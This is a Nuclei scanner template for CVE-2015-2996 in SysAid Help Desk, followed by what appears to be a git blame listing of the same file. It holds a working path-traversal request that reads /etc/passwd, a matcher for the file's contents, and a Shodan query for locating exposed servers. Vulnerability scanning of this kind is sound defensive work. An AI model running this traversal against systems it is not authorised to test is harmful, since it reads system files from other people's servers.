nuclei-templates/http/cves/2015/CVE-2015-2996.yaml

id: CVE-2015-2996

info:
  name: SysAid Help Desk <15.2 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: |
    SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.
  remediation: |
    Upgrade SysAid Help Desk to version 15.2 or later to mitigate the vulnerability.
  reference:
    - https://seclists.org/fulldisclosure/2015/Jun/8
    - https://www.sysaid.com/blog/entry/sysaid-15-2-your-voice-your-service-desk
    - http://seclists.org/fulldisclosure/2015/Jun/8
    - https://nvd.nist.gov/vuln/detail/CVE-2015-2996
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:C
    cvss-score: 8.5
    cve-id: CVE-2015-2996
    cwe-id: CWE-22
    epss-score: 0.77754
    epss-percentile: 0.97917
    cpe: cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: sysaid
    product: sysaid
    shodan-query: http.favicon.hash:1540720428
  tags: cve,cve2015,sysaid,lfi,seclists

http:
  - method: GET
    path:
      - "{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"
      - "{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100c94211ac0cea607a3e77d24b96b215cc3af25379b6e31413ff12fda19f2f1f580221009543bb24c1f637d92b5809d4da8ec436bace99e85954e594b78005e7f33db47d:922c64590222798bb761d5b6d8e72950
Create CVE-2015-2996.yaml 2022-09-27 21:42:24 +00:00			`id: CVE-2015-2996`
updated path 2023-02-07 04:30:16 +00:00
Create CVE-2015-2996.yaml 2022-09-27 21:42:24 +00:00			`info:`
Enhancement: cves/2015/CVE-2015-2996.yaml by md 2023-02-22 18:53:47 +00:00			`name: SysAid Help Desk <15.2 - Local File Inclusion`
Create CVE-2015-2996.yaml 2022-09-27 21:42:24 +00:00			`author: 0x_Akoko`
			`severity: high`
updated metadata, name and request 2023-02-07 04:29:53 +00:00			`description: \|`
Enhancement: cves/2015/CVE-2015-2996.yaml by md 2023-02-22 18:56:39 +00:00			`SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.`
updated other CVEs 2023-09-06 13:22:34 +00:00			`remediation: \|`
			`Upgrade SysAid Help Desk to version 15.2 or later to mitigate the vulnerability.`
Create CVE-2015-2996.yaml 2022-09-27 21:42:24 +00:00			`reference:`
			`- https://seclists.org/fulldisclosure/2015/Jun/8`
Auto Generated CVE annotations [Tue Feb 7 06:27:25 UTC 2023] :robot: 2023-02-07 06:27:25 +00:00			`- https://www.sysaid.com/blog/entry/sysaid-15-2-your-voice-your-service-desk`
			`- http://seclists.org/fulldisclosure/2015/Jun/8`
Enhancement: cves/2015/CVE-2015-2996.yaml by mp 2023-02-21 22:01:07 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2015-2996`
Create CVE-2015-2996.yaml 2022-09-27 21:42:24 +00:00			`classification:`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:C`
			`cvss-score: 8.5`
Create CVE-2015-2996.yaml 2022-09-27 21:42:24 +00:00			`cve-id: CVE-2015-2996`
			`cwe-id: CWE-22`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`epss-score: 0.77754`
TemplateMan Update [Mon Nov 20 05:10:39 UTC 2023] :robot: 2023-11-20 05:10:39 +00:00			`epss-percentile: 0.97917`
updated other CVEs 2023-09-06 13:22:34 +00:00			`cpe: cpe:2.3:a:sysaid:sysaid::::::::`
updated metadata, name and request 2023-02-07 04:29:53 +00:00			`metadata:`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`max-request: 2`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: sysaid`
			`product: sysaid`
updated other CVEs 2023-09-06 13:22:34 +00:00			`shodan-query: http.favicon.hash:1540720428`
Auto Generated CVE annotations [Tue Feb 7 06:27:25 UTC 2023] :robot: 2023-02-07 06:27:25 +00:00			`tags: cve,cve2015,sysaid,lfi,seclists`
Create CVE-2015-2996.yaml 2022-09-27 21:42:24 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create CVE-2015-2996.yaml 2022-09-27 21:42:24 +00:00			`- method: GET`
			`path:`
			`- "{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"`
updated metadata, name and request 2023-02-07 04:29:53 +00:00			`- "{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"`
Create CVE-2015-2996.yaml 2022-09-27 21:42:24 +00:00
updated metadata, name and request 2023-02-07 04:29:53 +00:00			`stop-at-first-match: true`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00
Create CVE-2015-2996.yaml 2022-09-27 21:42:24 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`regex:`
			`- "root:[x*]:0:0"`

			`- type: status`
			`status:`
			`- 200`
TemplateMan Update [Sun Nov 19 08:30:54 UTC 2023] :robot: 2023-11-19 08:30:54 +00:00
			`# digest: 4b0a00483046022100c94211ac0cea607a3e77d24b96b215cc3af25379b6e31413ff12fda19f2f1f580221009543bb24c1f637d92b5809d4da8ec436bace99e85954e594b78005e7f33db47d:922c64590222798bb761d5b6d8e72950`